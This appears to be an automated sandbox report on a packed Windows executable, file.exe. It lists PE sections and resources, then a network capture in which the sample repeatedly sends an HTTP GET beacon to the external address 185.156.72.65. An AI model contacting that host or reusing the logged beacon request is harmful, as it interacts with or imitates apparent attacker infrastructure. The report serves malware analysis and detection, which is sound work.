                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x4ba8e0 | 0x18 | encvjseq
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    | 0x1000 | 0x65000 | 0x3ae00 | 2d4341348ef45cb36004d531ca175f06 | False | 0.9955546709129511 | data | 7.944720387530333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x66000 | 0x8234 | 0x3c00 | fed55bb4f76ce9345551cca262146a13 | False | 0.926171875 | data | 7.709757848946499 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    | 0x70000 | 0x2a2000 | 0x200 | b9d9b0a3c1dc3c241be7997b0c525e86 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    encvjseq | 0x312000 | 0x1ac000 | 0x1abe00 | 1894cda96a39a1f65f92f7db14f68b34 | False | 0.9922970530236634 | data | 7.950828634969012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    schszwjt | 0x4be000 | 0x1000 | 0x600 | 35f75e21ea409b715b777220ec3bcaef | False | 0.5338541666666666 | data | 4.794870245401132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x4bf000 | 0x3000 | 0x2200 | 8081bf8c406bff125b1ad2ba7dc96c7b | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
                    RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
                    RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
                    RT_CURSOR | 0x68118 | 0xea8 | OpenPGP Public Key | | | 1.0029317697228144
                    RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
                    RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5173913043478261
                    RT_ICON | 0x4ba940 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
                    RT_ICON | 0x4ba940 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
                    RT_ICON | 0x4bb008 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
                    RT_ICON | 0x4bb008 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
                    RT_ICON | 0x4bd5b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
                    RT_ICON | 0x4bd5b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
                    RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
                    RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
                    RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
                    RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
                    RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
                    RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
                    RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
                    RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
                    RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
                    RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
                    RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
                    RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
                    RT_GROUP_ICON | 0x4bda18 | 0x30 | data | Tamil | India | 0.9375
                    RT_GROUP_ICON | 0x4bda18 | 0x30 | data | Tamil | Sri Lanka | 0.9375
                    RT_VERSION | 0x4bda48 | 0x254 | data | | | 0.5436241610738255
                    RT_MANIFEST | 0x4bdc9c | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                    DLL | Import
                    kernel32.dll | lstrcpy
                    Language of compilation system | Country where language is spoken
                    Tamil | India
                    Tamil | Sri Lanka
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 30, 2024 14:36:58.597740889 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:36:58.718518019 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:36:58.718755007 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:36:58.718892097 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:36:58.839010000 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:20.649779081 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:20.649873972 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:20.649966955 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:20.769876957 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:23.655289888 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:23.775279999 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:23.775420904 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:23.775619030 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:23.895591974 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:45.703319073 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:45.703509092 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:45.703509092 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:45.823465109 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:48.717365026 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:48.837671041 CET | 80 | 49738 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:48.837744951 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:48.837955952 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:48.957904100 CET | 80 | 49738 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:56.865400076 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:59.875869036 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:59.996232033 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:37:59.996325016 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:37:59.996587992 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:00.278942108 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:21.947092056 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:21.947202921 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:21.947364092 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:22.067188978 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:25.048568010 CET | 49807 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:25.231853008 CET | 80 | 49807 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:25.231957912 CET | 49807 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:25.236874104 CET | 49807 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:25.353130102 CET | 80 | 49807 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:25.353193998 CET | 49807 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:25.354604006 CET | 49807 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:25.356749058 CET | 80 | 49807 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:25.473031998 CET | 80 | 49807 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:25.474409103 CET | 80 | 49807 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:28.363244057 CET | 49818 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:28.483133078 CET | 80 | 49818 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:28.483258963 CET | 49818 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:28.483419895 CET | 49818 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:28.603288889 CET | 80 | 49818 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:28.603395939 CET | 80 | 49818 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:31.609476089 CET | 49827 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:31.730242968 CET | 80 | 49827 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:31.732172966 CET | 49827 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:31.732388973 CET | 49827 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:31.852255106 CET | 80 | 49827 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:48.577276945 CET | 49827 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:51.640172958 CET | 49872 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:51.762959957 CET | 80 | 49872 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:38:51.763065100 CET | 49872 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:51.763457060 CET | 49872 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:38:51.883841038 CET | 80 | 49872 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:13.729058027 CET | 80 | 49872 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:13.729590893 CET | 49872 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:13.729821920 CET | 49872 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:13.849663019 CET | 80 | 49872 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:16.735932112 CET | 49873 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:16.855829954 CET | 80 | 49873 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:16.855926037 CET | 49873 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:16.856372118 CET | 49873 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:16.976598024 CET | 80 | 49873 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:38.885831118 CET | 80 | 49873 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:38.885941982 CET | 49873 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:38.886128902 CET | 49873 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:39.005974054 CET | 80 | 49873 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:41.890808105 CET | 49874 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:42.010761976 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:42.011106968 CET | 49874 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:42.011497021 CET | 49874 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:42.131408930 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:50.856987953 CET | 49874 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:53.875592947 CET | 49875 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:53.995712042 CET | 80 | 49875 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:39:53.995945930 CET | 49875 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:53.999810934 CET | 49875 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:39:54.121088982 CET | 80 | 49875 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:15.917762041 CET | 80 | 49875 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:15.917949915 CET | 49875 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:15.918093920 CET | 49875 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:16.037909031 CET | 80 | 49875 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:18.922983885 CET | 49876 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:19.042881966 CET | 80 | 49876 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:19.042953968 CET | 49876 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:19.043276072 CET | 49876 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:19.163348913 CET | 80 | 49876 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:41.011645079 CET | 80 | 49876 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:41.011704922 CET | 49876 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:41.011868954 CET | 49876 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:41.132460117 CET | 80 | 49876 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:44.017632961 CET | 49877 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:44.137944937 CET | 80 | 49877 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:44.142333031 CET | 49877 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:44.142576933 CET | 49877 | 80 | 192.168.2.4 | 185.156.72.65
                    Nov 30, 2024 14:40:44.262634993 CET | 80 | 49877 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 14:40:58.735168934 CET | 49877 | 80 | 192.168.2.4 | 185.156.72.65
                    • 185.156.72.65
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.4 | 49730 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:36:58.718892097 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.4 | 49737 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:37:23.775619030 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.4 | 49738 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:37:48.837955952 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.4 | 49746 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:37:59.996587992 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.4 | 49807 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:38:25.236874104 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.4 | 49818 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:38:28.483419895 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.4 | 49827 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:38:31.732388973 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.4 | 49872 | 185.156.72.65 | 80 | 6624 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 14:38:51.763457060 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID: 8
                    Source IP: 192.168.2.4
                    Source Port: 49873
                    Destination IP: 185.156.72.65
                    Destination Port: 80
                    PID: 6624
                    Process: C:\Users\user\Desktop\file.exe
                    Timestamp: Nov 30, 2024 14:39:16.856372118 CET
                    Bytes transferred: 416
                    Direction: OUT
                    Data:
                    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID: 9
                    Source IP: 192.168.2.4
                    Source Port: 49874
                    Destination IP: 185.156.72.65
                    Destination Port: 80
                    PID: 6624
                    Process: C:\Users\user\Desktop\file.exe
                    Timestamp: Nov 30, 2024 14:39:42.011497021 CET
                    Bytes transferred: 416
                    Direction: OUT
                    Data:
                    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID: 10
                    Source IP: 192.168.2.4
                    Source Port: 49875
                    Destination IP: 185.156.72.65
                    Destination Port: 80
                    PID: 6624
                    Process: C:\Users\user\Desktop\file.exe
                    Timestamp: Nov 30, 2024 14:39:53.999810934 CET
                    Bytes transferred: 416
                    Direction: OUT
                    Data:
                    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID: 11
                    Source IP: 192.168.2.4
                    Source Port: 49876
                    Destination IP: 185.156.72.65
                    Destination Port: 80
                    PID: 6624
                    Process: C:\Users\user\Desktop\file.exe
                    Timestamp: Nov 30, 2024 14:40:19.043276072 CET
                    Bytes transferred: 416
                    Direction: OUT
                    Data:
                    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID: 12
                    Source IP: 192.168.2.4
                    Source Port: 49877
                    Destination IP: 185.156.72.65
                    Destination Port: 80
                    PID: 6624
                    Process: C:\Users\user\Desktop\file.exe
                    Timestamp: Nov 30, 2024 14:40:44.142576933 CET
                    Bytes transferred: 416
                    Direction: OUT
                    Data:
                    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache



                    Target ID:0
                    Start time:08:36:54
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'024'448 bytes
                    MD5 hash:D2A93D9F269CBD3B444400D586999E01
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
